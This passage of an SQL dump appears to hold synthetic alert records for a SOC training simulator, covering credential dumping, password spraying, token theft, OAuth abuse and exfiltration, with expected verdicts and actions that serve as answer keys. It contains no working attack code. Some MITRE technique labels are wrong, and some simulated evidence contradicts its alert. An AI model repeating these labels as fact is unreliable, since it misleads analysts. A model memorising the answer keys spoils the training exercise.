3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(432, 'Data Exfiltration via Encrypted Channel', 'high', 'Network Traffic Analysis', 'In the final phase of the operation, Cl0p utilized encrypted channels to exfiltrate sensitive data from the network, leveraging legitimate file transfer protocols such as SFTP to avoid detection.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:30:00Z\",\"event\":\"Data Exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.100.87.200\",\"protocol\":\"SFTP\",\"file_name\":\"financial_report_2023.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"encryption\":\"AES256\",\"bytes_transferred\":5242880,\"connection_duration\":360}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Identified as a command-and-control server associated with Cl0p.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file potentially exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known stolen data set.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(433, 'Suspicious Login Attempts Detected', 'high', 'SIEM', 'Initial access is attempted through a series of password spraying attacks targeting cloud accounts of diplomatic personnel.', 'Password Spraying', 'T1110.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:23Z\",\"event_source\":\"cloud.service\",\"event_type\":\"login_attempt\",\"user\":\"diplomat_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"success\":false,\"attempt_count\":15,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\",\"attack_pattern\":\"Password Spraying\",\"associated_hash\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"malicious\":true}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 password spraying campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted cloud account.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"diplomat_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"clean\",\"details\":\"Valid diplomatic personnel cloud account.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(434, 'Unusual Token Usage Pattern', 'high', 'Cloud Access Security Broker (CASB)', 'Anomalous token usage detected following a successful password spraying attack. Stolen tokens were used to bypass MFA, indicating potential privilege escalation attempts.', 'Token Theft', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_source\":\"CASB\",\"event_type\":\"Token Usage\",\"user\":\"jdoe@corporate.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.10.5\",\"token_id\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"file_accessed\":\"/secure/finance_reports/q3_2023.pdf\",\"token_status\":\"anomalous\",\"related_hash\":\"e99a18c428cb38d5f260853678922e03\",\"context\":\"Token used to access privileged resources without MFA verification\"}', '2026-01-04 23:55:22', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe@corporate.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account used in suspicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with anomalous token usage tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(435, 'Creation of Unauthorized OAuth Applications', 'high', 'Cloud Application Logs', 'An unauthorized OAuth application was created, indicating potential abuse for persistent access to cloud email systems.', 'OAuth Abuse', 'T1550.001 - OAuth Abuse', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"oauth-creation-5678\",\"action\":\"create_oauth_app\",\"user\":\"compromised_user@example.com\",\"application_name\":\"RogueApp\",\"application_id\":\"app-123456789\",\"client_id\":\"client-98765\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"username\":\"compromised_user@example.com\"}}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known OAuth abuse campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(436, 'Lateral Movement Detected in Cloud Environment', 'high', 'Network Traffic Analysis', 'A lateral movement within the cloud infrastructure was detected. The attacker, leveraging existing access, targeted additional diplomatic cloud accounts. Indicators of compromise involved suspicious internal IP communications and unauthorized access from a known malicious IP.', 'Cloud Exploitation', 'T1550.004 - Cloud Instance Metadata API', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:45:32Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.5.23\",\"external_ip\":\"203.0.113.45\",\"user\":\"diplomatic_user_x\",\"action\":\"login_attempt\",\"status\":\"success\",\"hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"filename\":\"malicious_script.sh\",\"description\":\"Detected lateral movement from internal IP 192.168.1.102 to 10.0.5.23 with successful login using diplomatic_user_x. External IP 203.0.113.45 has known malicious activity associated with APT29.\",\"indicator_type\":\"Cloud Exploitation\",\"notable_tool\":\"OAuth Abuse\"}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT29 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP involved in lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"diplomatic_user_x\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(437, 'Data Exfiltration Alert', 'high', 'Data Loss Prevention (DLP) System', 'In the final stage of the operation, attackers attempted to exfiltrate sensitive diplomatic communications and data. The DLP system detected unusual data transfer activities originating from an internal host to an external IP address associated with known malicious activity.', 'Data Exfiltration', 'T1002: Data Compressed', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"action\":\"data_transfer\",\"file_transferred\":\"diplomatic_communications.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-20231015-001\",\"description\":\"Unusual data transfer detected to external IP\",\"malware_association\":\"APT29\"}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"diplomatic_communications.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive diplomatic communications\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 exfiltration tactics\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User within the 